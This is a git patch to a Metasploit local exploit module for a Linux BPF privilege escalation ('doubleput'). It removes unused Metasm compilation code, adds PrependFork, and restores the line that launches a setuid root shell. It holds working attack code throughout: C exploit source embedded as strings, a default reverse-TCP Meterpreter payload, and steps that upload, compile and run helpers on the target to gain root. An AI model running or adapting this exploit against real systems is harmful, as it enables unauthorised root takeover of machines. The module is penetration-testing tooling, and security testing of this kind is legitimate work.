From 2c4a069e328e74f69996087b9c5be581feb2dc1e Mon Sep 17 00:00:00 2001 From: h00die Date: Sun, 9 Oct 2016 09:40:44 -0400 Subject: [PATCH] prepend fork fix --- modules/exploits/linux/local/bpf_priv_esc.rb | 46 ++------------------ 1 file changed, 4 insertions(+), 42 deletions(-) diff --git a/modules/exploits/linux/local/bpf_priv_esc.rb b/modules/exploits/linux/local/bpf_priv_esc.rb index ef1d8e6536..6d7d829967 100644 --- a/modules/exploits/linux/local/bpf_priv_esc.rb +++ b/modules/exploits/linux/local/bpf_priv_esc.rb @@ -4,8 +4,6 @@ ## require 'msf/core' -require 'msf/core/exploit/local/linux_kernel' -require 'msf/core/exploit/local/linux' class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking @@ -13,7 +11,6 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper - include Msf::Exploit::Local::Linux def initialize(info={}) super( update_info( info, { @@ -47,6 +44,7 @@ class MetasploitModule < Msf::Exploit::Local 'DefaultOptions' => { 'payload' => 'linux/x64/mettle/reverse_tcp', + 'PrependFork' => true, 'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through }, 'DefaultTarget' => 1, @@ -134,20 +132,6 @@ class MetasploitModule < Msf::Exploit::Local register_file_for_cleanup(file_path) end - doubleput_sc = Metasm::ELF.new(@cpu) - #@include_search_path = ['/usr/include/c++/6'] - #@@include_search_path = ['/usr/include/c++/6'] - #include_search_path = ['/usr/include/c++/6'] - #doubleput_sc.parse %Q| - # #define DEBUGGING - # #define NULL ((void*)0) - # #ifdef __ELF__ - # .section ".bss" rwx - # .section ".text" rwx - # .entrypoint - # #endif - #| - doubleput = %q{ #define _GNU_SOURCE #include @@ -288,33 +272,11 @@ class MetasploitModule < Msf::Exploit::Local sleep(1); } fputs("suid file detected, launching rootshell...\n", stderr); - #execl("./suidhelper", "suidhelper", NULL); - exit(0); + execl("./suidhelper", "suidhelper", NULL); err(1, "execl suidhelper"); } } - cparser.parse(doubleput, 'doubleput.c', path = '/usr/include/c++/6') - # This will give you all the structs and #defines (from all included - # headers) that are actually used by our C code so we can avoid - # needing them at runtime. - puts cparser.factorize - - asm = cpu.new_ccompiler(cparser, doubleput_sc).compile - doubleput_sc.parse asm - doubleput_sc.assemble - - begin - elf = doubleput_sc.encode_string - rescue - print_error "Metasm Encoding failed: #{$!}" - elog "Metasm Encoding failed: #{$!.class} : #{$!}" - elog "Call stack:\n#{$!.backtrace.join("\n")}" - return - end - return - - suid_helper = %q{ #include #include @@ -501,8 +463,8 @@ class MetasploitModule < Msf::Exploit::Local # make our substitutions so things are dynamic suid_helper.gsub!(/execl\("\/bin\/bash", "bash", NULL\);/, "return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable - #doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/, - # 'exit(0);') + doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/, + 'exit(0);') print_status('Writing files to target') cmd_exec("cd #{datastore['WritableDir']}") upload_and_compile('hello', hello_path, hello, compile ? "gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`" : nil)